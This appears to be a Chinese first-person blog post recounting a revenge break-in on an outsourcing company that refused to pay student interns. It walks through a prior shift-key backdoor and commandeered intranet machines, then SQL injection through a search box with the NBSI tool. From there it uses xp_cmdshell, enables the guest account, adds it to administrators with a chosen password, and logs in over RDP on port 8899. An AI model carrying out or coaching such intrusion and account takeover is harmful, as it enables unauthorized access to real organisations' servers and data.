话说上学期我们班上十几个同学被老师推荐到XX软件外包公司时行两天的短暂实习(其实就差不多是让我们做体力活),由于完成任务的质量不是很好。所以没给我们任何工资。同学那个气愤呀。。于是乎第二天就对其公司网站进行检测。很顺利的拿到了服务器3389权限(是有前人进去了,留了shift后门,绕了一大圈)。进去后也没做啥,也就抓几台他们内网的肉鸡玩玩,后来网站又给别人黑了。首页都不能正常打开,服务器管理员恢复了过后我所有的权限都不在了,也罢,这不现在无意中又来到这个网站了。还是先从web找漏洞吧。。测试了几个链接,果然没有明显注入点。就东点点,西看看。发现有个搜索功能。
在搜索框里输入了个单引号',立即出现了报错页面。很明显的没有过虑。呵呵。
这下好办了。马上构造注入点
http://www.xxxx.com/cn/Aboutxxx/NewsSearchResult.aspx?s=5拿到NBSI里去检测。不一会结果就出来了。还是用SA连接的数据库呢。从列目录的对照性来看,web服务器和数据库服务器没有分离。试试NBcommander执行命令。netstat -an看开放了哪些端口,运气不错,管理员没禁用xp_cmdshell,还可以执行且还有回显。但看不清楚。。
这个好办,win+r输入notepad打开记事本,将结果粘贴,再ctrl+h将 全部替换为空格
这下看得清楚了。
看到那个8899端口,直觉给我说那是管理员将3389改成了8899的。CMD里面打入mstsc -v
www.xxx.com:8899,成功出现登陆界面,
回到NBSI里执行net user guest /acitve:yes将guest启用。net localgroup administrators guest /add
net user guest 442685579admi520加为管理员组并改密码,顺利登陆。。。
最后发了个email通知管理员。。
